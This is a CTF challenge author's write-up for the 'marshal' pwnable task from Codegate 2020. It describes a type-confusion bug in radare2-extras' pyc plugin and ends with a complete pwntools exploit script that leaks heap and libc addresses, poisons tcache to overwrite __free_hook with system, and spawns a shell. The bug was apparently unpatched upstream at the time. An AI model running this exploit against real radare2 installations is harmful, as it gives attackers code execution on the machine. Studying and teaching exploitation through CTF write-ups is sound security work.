Introduction

Recently I got the change to author 2 challenges for CodegateCTF 2020 quals. I wrote two pwnable tasks, babyllvm and marshal. The second one, marshal was released 12 hours before the end and therefore didn’t get any solves, despite the fact that it isn’t that difficult. On the other hand babyllvm was released at the start of the CTF and was solved by PPP in just 2 hours, which is very impressive (but expected, it’s PPP…) I’m going to describe how I thought of the idea for this challenge in this post. If you want to go straight to the exploit, go straight to the end.

Motivations

Nowadays CTF players, especially those who play pwnable tasks are bored of the make note cliche. Also, there isn’t really anything new to extract in the field of glibc heap exploitation techniques. But still, I felt that there should be a task with lots of memory corruption, since my other task, babyllvm didn’t require a complex exploit. So I decided to pick a real-worldish target that has a clear bug, but requires lots of debugging and messing around. At first, I looked at the unicorn engine, and did some fuzzing and code-auditing. However, I couldn’t find any bugs, which was depressing. So I decided to take a look at capstone, the well-known disassembly framework. However, I found that capstone already has a decent harness for fuzzing, and thought that all the ‘shallow’ bugs should’ve been fixed. Afterwards I looked at radare2, and thought it would be nice because it had many CVEs involving memory corruption such as heap overflows, use-after-frees, etc.

Most of the bugs there were limited to a certain architecture or file format, so I decided to select a certain file format or architecture, and look for bugs in them. My selection was pyc, because it’s a very familiar format to CTFers, and the code amount for that plugin was adequate for a 24-hour pwnable task. The pyc module was not a default in radare, it was written in the form of a plugin which I could find in the radare2-extras repository. I looked through the codes and immediately found two bugs. The first two bugs were definitely exploitable, but not that interesting. Since anyone could identifty them as bugs, I fixed them via a pull request.

Then I looked at the code a little bit more and found another bug, which became the idea for the challenge. At first, I wanted to make the challenge concept a radare2 jail. This is based on the fact that radare2 actually has a mode called sandboxed mode, which prevents access to networking and filesystems. Sandboxed mode can be enabled by providing the -S option. I wanted to make a challenge that uses memory corruption vulnerabilities to escape the sandbox. However, I gave up on this for two reasons.

First, I found a trick for breaking the sandbox. But I could solve this by disabling the debugger build in the ./configure script by providing the option --disable-debugger. The second problem was that radare2’ shell has an undeterministic heap layout. There were many reasons for this. One was that the ‘quote of the day’ is randomly selected and has various lengths. Another reason is because radare2 keeps a history cache that is written to a file. Also, radare2 had a complex shell IO mechanism that probably involved heap allocation and deallocation. So I changed my plan.

I decided to make a small program using the radare2 API, so that the heap randomness and all potential unintended solutions were removed.

#include <stdio.h>
#include <stdlib.h>
#include <r_bin.h>
#include <r_asm.h>
#include <r_list.h>
#include <r_util/r_buf.h>
#include <r_types.h>

typedef struct {
    RBuffer *f_buf;
    RAsm *f_asm;
} file;

static void printmenu() {
    puts("[1] Load a new file\n[2] Print disassembly");
}

static ut32 read_ut32() {
    char buf[0x20];
    fgets(buf, sizeof(buf), stdin);
    return (ut32)atoi(buf);
}

static ut64 read_ut64() {
    char buf[0x20];
    fgets(buf, sizeof(buf), stdin);
    return (ut64)atoll(buf);
}

static file *load_file() {
    
    printf("Enter length: ");
    ut64 len = read_ut64();
    if (len > 0x1000) {
        puts("too long!");
        return NULL;
    }

    ut8 *ptr = calloc(sizeof(ut8), len);
    fread(ptr, sizeof(ut8), len, stdin);

    RAsm *asm_ = r_asm_new(); 
    RBin *bin = r_bin_new();
    RBuffer *buf = r_buf_new_with_bytes(ptr, len);
    free(ptr);

    RBinOptions opt = {0};
    opt.sz = len;
    opt.pluginname = "pyc";
    opt.filename = "sample";

    bool res = r_bin_open_buf (bin, buf, &opt);
    if (!res) {
    error:
        puts("invalid file");
        r_bin_free (bin);
        return NULL;
    }

    if (!r_asm_use(asm_, "pyc")) {
        puts("unreachable error: contact admin");
        goto error;
    }

    r_bin_bind(bin, &asm_->binb);

    file *new = R_NEW0(file);
    new->f_buf = buf;
    new->f_asm = asm_;

    return new;
}

static void print_disasm(file *f) {
    RAsm *asm_ = f->f_asm;
    RBuffer *buf = f->f_buf;
    RAsmOp op;
    ut64 dlen, pos;
    ut8 *data;
    data = r_buf_data(buf, &dlen);
    if (!data) {
        puts("out of memory!");
        exit(-1);
    }
    pos = 0;
    while(pos < dlen) {
        r_asm_set_pc(asm_, pos);
        int incr = r_asm_disassemble(asm_, &op, data + pos, dlen - pos);
        if (!incr) {
            pos++;
        }
        else {
            printf("[%08x] %s\n", pos, r_asm_op_get_asm(&op));
            pos += incr;
        }
        
    }
    
}

int main(int argc, char **argv) {

    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    RList *files = r_list_new();

    while(1) {
        printmenu();
        ut32 opt = read_ut32();
        switch(opt) {
            case 1: {
                file *f = load_file();
                if (f) {
                    if (!r_list_append(files, f)) {
                        puts("r_list_append failed");
                        exit(-1);
                    }
                }
                break;
            }   
            case 2: {
                printf("Enter index: ");
                ut32 idx = read_ut32();
                if (idx >= r_list_length(files)) {
                    puts("invalid index");
                    exit(-1);
                }
                print_disasm(r_list_get_n(files, idx));
                break;
            }   
            default:
                puts("invalid option!");
                exit(-1);
        }
    }
    
    return 0;
}

It’s basically a program that takes in a pyc file from stdin and anlyzes it, printing disassembly if the user requests one. I made it so that it looks like a classic menu challenge, so that it isn’t intimidating to players.

To link the radare2 api libraries with the main program, I fixed the makefiles for radare2. While doing this, I learned a lot about makefiles unintentionally.

Vulns

There is only one bug that I used, but it was possible to use the bug for many purposes. The bug, in high level is a type confusion vulnerability. The python module consists of two parts, the bin module which parses the binary file and extracts sessions and segments, and the asm module which generates the disassembly string for the bytecode.

A pyc file consists of a pyc header and a marshal code object. Marshal, which is also the name of the challenge, is an encoding method to represent python objects in binary format. One of the types of python objects, which is a python code object, is parsed in the manner below.

static pyc_object *get_code_object (RBuffer *buffer) {
    bool error = false;
    
    pyc_object *ret = R_NEW0 (pyc_object);
    pyc_code_object *cobj = R_NEW0 (pyc_code_object);
    if (!ret || !cobj) {
        free (ret);
        free (cobj);
        return NULL;
    }
    
    ret->type = TYPE_CODE_v1;
    ret->data = cobj;

    cobj->argcount = get_ut32 (buffer, &error);
    //cobj->kwonlyargcount = get_ut32 (buffer, &error);
    cobj->nlocals = get_ut32 (buffer, &error);
    cobj->stacksize = get_ut32 (buffer, &error);
    cobj->flags = get_ut32 (buffer, &error);

    //to help disassemble the code
    cobj->start_offset = r_buf_tell(buffer) + 4;
    cobj->code = get_object (buffer);
    cobj->end_offset = r_buf_tell(buffer);

    cobj->consts = get_object (buffer);
    cobj->names = get_object (buffer);
    cobj->varnames = get_object (buffer);
    cobj->freevars = get_object (buffer);
    cobj->cellvars = get_object (buffer);
    cobj->filename = get_object (buffer);
    cobj->name = get_object (buffer);
    cobj->firstlineno = get_ut32 (buffer, &error);
    cobj->lnotab = get_object (buffer);
    if (error) {
        free_object (cobj->code);
        free_object (cobj->consts);
        free_object (cobj->names);
        free_object (cobj->varnames);
        free_object (cobj->freevars);
        free_object (cobj->cellvars);
        free_object (cobj->filename);
        free_object (cobj->name);
        free_object (cobj->lnotab);
        free (cobj);
        R_FREE (ret);
    }
    return ret;
}

You can see that a code object has sub-objects in the names of consts, names, varnames, and etc. And these objects are used in the assembly module to generate comments for assembly, as you can see below.

int r_pyc_disasm (RAsmOp *opstruct, const ut8 *code, RList *cobjs, RList *interned_table, ut64 pc) {
    pyc_code_object *cobj = NULL, *t = NULL;
    ut32 extended_arg = 0, i = 0, oparg;
    st64 start_offset, end_offset;
    RListIter *iter = NULL;

    char *name = NULL;
    char *arg = NULL;
    RList *varnames;
    RList *consts;
    RList *names;
    ut8 op;

    r_list_foreach (cobjs, iter, t) {
        start_offset = t->start_offset;
        end_offset = t->end_offset;
        if (pc > start_offset && pc < end_offset) {
            cobj = t;
            break;
        }
    }

    if (cobj != NULL) {
        /* TODO: adding line number and offset */
        varnames = cobj->varnames->data;
        consts = cobj->consts->data;
        names = cobj->names->data;

        op = code[i];
        i += 1;
        name = op_name[op];
        r_strbuf_set (&opstruct->buf_asm, name);
        if (name == NULL) {
            return 0;
        }
        if (op >= HAVE_ARGUMENT) {
            oparg = code[i] + code[i+1]*256 + extended_arg;
            extended_arg = 0;
            i += 2;
            if (op == EXTENDED_ARG)
                  extended_arg = oparg*65536;
              arg = parse_arg (op, oparg, names, consts, varnames, interned_table);
            if (arg != NULL) {
                r_strbuf_appendf (&opstruct->buf_asm, "%20s", arg);
            }
        }
        return i;
    }
    return 0;
}

Now you need to check the function type of parse_arg, which is char *parse_arg (ut8 op, ut32 oparg, RList *names, RList *consts, RList *varnames, RList *interned_table). Therefore we can know that names and consts are python list objects. However, in the bin module the types of names and consts is not checked. Therefore we can provide a string object as names or consts which causes a lot of trouble. Now we’ll see how to use this to build an arbitrary read/write primitive.

Exploitation Plan

The first usage exists in libr/asm/arch/pyc_disasm.c. It is a pointer leak bug when disassembling the LOAD_GLOBAL opcode.

case LOAD_GLOBAL:
        t = (pyc_object*)r_list_get_n (names, oparg);
        if (t == NULL)
            return NULL;
        arg = t->data;

        ...

 arg = parse_arg (op, oparg, names, consts, varnames, interned_table);
            if (arg != NULL) {
                r_strbuf_appendf (&opstruct->buf_asm, "%20s", arg);
            }   

t->data is asserted to be a char *, but for some python objects, such as a list or tuple object, t->data is a RList *. Therefore, by ‘print’ing an RList structure like a string leaks a heap pointer.

The second usage exists in the LOAD_CONST opcode and it also exists in pyc_disasm.c. Its root cause is that the disassembly module asserts the variable consts to be a python list object, where it can actually be anything: a float, string, ref… By faking a list object, we can obtain an arbitrary read primitive.

 case LOAD_CONST:
        t = (pyc_object*)r_list_get_n (consts, oparg);

The third usage needs more analysis, so it will be mentioned in the exploit analysis. But to jump to the conclusion, it is a very stable heap buffer overflow.

Infoleaks

We first use the two bugs to leak heap, libc and other ‘juicy’ addresses. The first bug is easy to exploit. By making a pyc file like the following we can leak a heap address.

magic = 0x0a0df303
date = 0
pay = p32(magic) + p32(date)
# a code object
pay += b"c"
# argsize nlocals stacksize flags
pay += p32(0) + p32(0) + p32(0) + p32(0)
# code
code = p8(116) + p32(0)
pay += string_object(code)
# consts, names, varnames, freevars, cellvars, filename, name
pay += string_object(b"x") 
pay += list_object([list_object([string_object(b"z")])])
pay += string_object(b"x") * 5
# firstlineno
pay += p32(0)
pay += string_object(b"x")

The variable, names is not a list object containing a list object. So, r_list_get_n (names, 0) will return a list object containing a string object. Therefore, t->data will be an RList structure pointer which looks like the following.

typedef struct r_list_t {
    RListIter *head;
    RListIter *tail;
    RListFree free;
    int length;
    bool sorted;
} RList;

So the head field will be leaked, which is most likely a heap pointer.

To exploit the second bug, we need to place user controlled data at a known address. This is easy, because we have a heap leak due to the first bug. Then we make the consts variable a string whose value is p64(POINTER) where

POINTER ----> POINTER 1 (RList->head) ----> POINTER 2 (RListIter->data) ----> POINTER 3 (pyc_object->data)

Using this layout, we can read data located at POINTER 3.

Heap Overflow

To obtain an arbitrary write primitive, we use a bug in the disassembly module. The bug exists at the generic_array_obj_to_string function in libr/asm/arch/pyc/pyc_disasm.c.

char *generic_array_obj_to_string (RList *l) {
    RListIter *iter = NULL;
    pyc_object *e = NULL;
    ut32 size = 256, used = 0;
    char *r = NULL, *buf = NULL;

    buf = (char*)calloc (1024, 0);
    r_list_foreach (l, iter, e) {
        while ( !(strlen (e->data) < size) ) { /* [1] */
            size *= 2;
            buf = realloc (buf, used + size);
            if (!buf) {
                eprintf ("generic_array_obj_to_string cannot request more memory");
                return NULL;
            }
        }
        strcat (buf, e->data);
        strcat (buf, ",");
        size -= strlen (e->data) + 1; /* [2] */
        used += strlen (e->data) + 1;
    }
    /* remove last , */
    buf[ strlen(buf)-1 ] = '\0';
    r = r_str_newf ("(%s)", buf);
    free(buf);
    return r;
}

Under normal circumstances, there should not be any exploitable bugs within the code. I think there might be off-by-one overflow bugs but they are really hard to exploit. But the main problem here is that strlen is called on e->data multiple times, without saving it in a local variable. Therefore, strlen (e->data) may have different values for [1] and [2]. How can this be possible? If strcat calls alter contents in e->data it can be possible.

This function is called when handling the LOAD_CONST opcode.

case LOAD_CONST:
        t = (pyc_object*)r_list_get_n (consts, oparg);
        if (t == NULL)
            return NULL;
        switch (t->type) {
        case TYPE_CODE_v1:
            arg = strdup("CodeObject");
        break;
        case TYPE_TUPLE:
            arg = generic_array_obj_to_string (t->data);
        break;
        case TYPE_STRING:
        case TYPE_INTERNED:
        case TYPE_STRINGREF:
            arg = r_str_newf ("'%s'", t->data);
        break;
        default:
            arg = t->data;
        }
    break;

However as mentioned before, the consts variable can be a fake RList structure forged by a user supplied payload. This implies that the argument to generic_array_obj_to_string can be an arbitrary pointer. Therefore, we can create a condition where e->data changes between [1] and [2].

One easy idea is to make e->data equal to buf. However, makeing buf and e->data overlap causes strcat to loop infinitely, as mentioned in the man page of strcat.

So, we make the second call to strcat (appending “,”) change e->data. So we carefully forge RList *l so that it satisfies the following conditions.

1. l has 3 entries.
2. The first entry is a string with length 254.
3. The second entry points to buf + 255
4. The third entry contains the string to overflow the buffer

Now, let’s process the entries one by one.

  1. When the first entry is processed, size will be reduced to 256 - 254 - 1 = 1.
  2. During the processing of the second entry, realloc will not be called because strlen(e->data) is 0 and size is 1. strlen(e->data) is 0 because e->data points to buf + 255 which is the middle of an untouched calloc‘ed buffer. However, strlen(e->data) in [2] is 1, due to the added “,” character. Therefore size becomes 1 - 1 - 1 which is 0xFFFFFFFF.
  3. Now that size is INT_MAX we can strcat anything without worrying about size limit.

There are many structures to overwrite, but I chose to overwrite the fd of a tcache bin to __free_hook. Afterwards using a pyc float object I got __free_hook allocated and obtained a shell.

Here is my exploit script.

#!/usr/bin/python3
from pwn import *
import sys
import subprocess

def string_object(data):
    return b"s" + p32(len(data)) + data

def string_object_with_ref(data):
    return p8(ord("s")^0x80) + p32(len(data)) + data

def list_object(objects):
    n = len(objects)
    pay = b"["
    pay += p32(n)
    for x in objects:
        pay += x
    return pay

def tuple_object(objects):
    n = len(objects)
    pay = b"("
    pay += p32(n)
    for x in objects:
        pay += x
    return pay

def stringref_object(ref):
    pay = b"R"
    pay += p32(ref)
    return pay

def interned_object(data):
    return b"t" + p32(len(data)) + data

def float_object(data):
    return b"f" + p8(len(data)) + data

def ref_object(ref):
    pay = b"r"
    pay += p32(ref)
    return pay

def random_pyc(seed):
    trim = lambda x: x & 0xF0
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object
    pay += b"c"
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_GLOBAL)
    code = p8(116) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    for x in seed[:7]:
        if x & 1:
            pay += string_object(b"x"*expand(x))
        else:
            pay += float_object(b"y"*trim(x))

    # firstlineno
    if seed[7] & 1:
        pay += p32(0)
        pay += string_object(b"x")

    return pay

def heap_leak_pyc():
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object
    pay += b"c"
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_GLOBAL)
    code = p8(116) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    pay += string_object(b"x") 
    pay += list_object([list_object([string_object(b"z")])])
    pay += string_object(b"x") * 5
    # firstlineno
    pay += p32(0)
    pay += string_object(b"x")
    return pay

def aar_pyc(where, leak):
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object
    pay += b"c"
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_CONST)
    code = p8(100) + p32(0)
    pay += string_object(code)
    # consts
    ptr = leak + 0x55702a874d00 - 0x55702a85c6e0
    pay += float_object(p64(ptr+8)+p64(ptr+0x10)+p64(ptr+0x18)+p64(where)) 
    # names, varnames, freevars, cellvars, filename, name
    pay += string_object(b"x") * 6
    # firstlineno
    pay += p32(0)
    pay += string_object(b"x")
    return pay

def exp1(leak, where):
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object with ref, so that None is pushed to list[0]
    pay += p8(0x80^ord("c"))
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_CONST)
    code = p8(100) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    ptr = leak + 0x55a27f113b70 - 0x55a27f0e26e0
    # fake RList object -> head
    fakelist = p64(ptr+8)
    # data, next
    fakelist += p64(ptr+0x18) + p64(0)
    # tuple object
    fakelist += p64(ord("(")) + p64(ptr+0x28)
    # RList structure -> head
    fakelist += p64(ptr+0x30)
    # data, next
    fakelist += p64(ptr+0x40) + p64(ptr+0x50)
    # list[0]: string object
    fakelist += p64(ord("s")) + p64(ptr+0x90)
    # data, next
    fakelist += p64(ptr+0x60) + p64(ptr+0x70)
    # list[1]: string object, points to calloced buffer
    calloced = leak + 0x55daa8fc6480 - 0x55daa8f7b6e0
    fakelist += p64(ord("s")) + p64(calloced+0xFF)
    # data, next
    fakelist += p64(ptr+0x80) + p64(0)
    # list[2]: string object. now size is -1, we can do pretty much anything
    fakelist += p64(ord("s")) + p64(ptr+0x90+0x100)
    str1 = b"\xcc"*0xFE
    str2 = b"\xdd"*(0x55608a8ca5c0 - 0x55608a8ca580) + p64(where)
    fakelist += str1.ljust(0x100, b"\x00")
    fakelist += str2.ljust(0x100, b"\x00")

    fakelist = fakelist.ljust(0x800, b"\x00")
    # a fake RList structure
    pay += string_object(fakelist)
    pay += string_object(b"x") * 6
    pay += p32(0)
    pay += string_object(b"x")
    return pay

def exp2(what):
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object with ref, so that None is pushed to list[0]
    pay += p8(0x80^ord("c"))
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_CONST)
    code = p8(100) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    pay += float_object(b"\x00"*0xFF)
    pay += float_object(what.ljust(0xFF, b"\x00"))
    return pay

def exp3(cmd):
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object with ref, so that None is pushed to list[0]
    pay += p8(0x80^ord("c"))
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_CONST)
    code = p8(100) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    pay += string_object(cmd)
    return pay

def feng1():
    magic = 0x0a0df303
    date = 0
    pay = p32(magic) + p32(date)
    # a code object
    pay += b"c"
    # argsize nlocals stacksize flags
    pay += p32(0) + p32(0) + p32(0) + p32(0)
    # code (LOAD_GLOBAL)
    code = p8(116) + p32(0)
    pay += string_object(code)
    # consts, names, varnames, freevars, cellvars, filename, name
    pay += string_object(b"\x00"*0x590)
    pay += string_object(b"\x00"*0x100)
    return pay

def load(data):
    p.sendlineafter("[2] Print disassembly\n", "1")
    p.sendlineafter("Enter length: ", str(len(data)))
    p.send(data)

def disassemble(index):
    p.sendlineafter("[2] Print disassembly\n", "2")
    p.sendlineafter("Enter index: ", str(index))

if __name__ == "__main__":

    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    p = remote(sys.argv[1], int(sys.argv[2]))
    # leak a heap address
    load(heap_leak_pyc())
    disassemble(0)
    p.recvuntil("LOAD_GLOBAL              ")
    HEAP = u64(p.recvline().strip(b"\n").ljust(8,b"\x00"))
    log.info("HEAP: 0x%x"%HEAP)

    # leak a libc address
    load(aar_pyc(HEAP + 0x5648213fc3f0 - 0x5648214146e0, HEAP))
    disassemble(1)
    p.recvuntil("LOAD_CONST              ")
    # plugin_free
    LIBC = u64(p.recvline().strip(b"\n").ljust(8,b"\x00")) + 0x7f97c9d56000 - 0x7f97ca98557a

    log.info("LIBC: 0x%x"%LIBC)
    free_hook = LIBC + libc.symbols[b'__free_hook']
    system = LIBC + libc.symbols[b'system']

    load(exp1(HEAP, free_hook))
    # create a layout like unsorted bin -- tcache (0x110)
    load(feng1())
    disassemble(2)

    # overflowing will cause tcache entry to be corrupted, next-next malloc to 0x100 will cause __free_hook to be allocated
    load(exp2(p64(system)))

    # free hook is now overwritten to system. execute any shell command
    load("/bin/sh\x00")
    p.interactive()

Overall

I think a few teams successfully worked out the first and second usages of the bug. However, the last usage wasn’t found by any team. (this is my guess, but maybe someone could’ve been very close to solving the challenge) I think it’s because the notion that a heap overflow occurs in the disassembly generation phase is very counter-intuitive, as printing a state usually doesn’t have critical side effects in most programs. I myself took some time to find the third usage and thought of reverting the first bug. (a single null byte overflow) However, I think it was a good decision not to implant that bug, because it’s so shitty to craft an exploit for a single null byte overflow where allocation and deallocation takes place so often.

BTW, thanks for everyone who participated in codegate CTF 2020. I decided to publish a write-up for babyllvm after the write-up submissions are done. Also, I wish to see writeups for solved challenges, so that I can know if I made a mistake or there is a better solution other than the intended one.

Babyllvm got 40 solves, and marshal got no solves. But I’m pretty sure that if we ran the CTF for 48 hours, marshal would get > 10 solves.

Scoreboard

And one important thing: I’m planning to make a pull request to radare2-extras as soon as possible. if you found a bug other than the one I mentioned, please make a pull request for that as well.

For those who are participating in the final: I will prepare even more fun tasks for the final, be ready!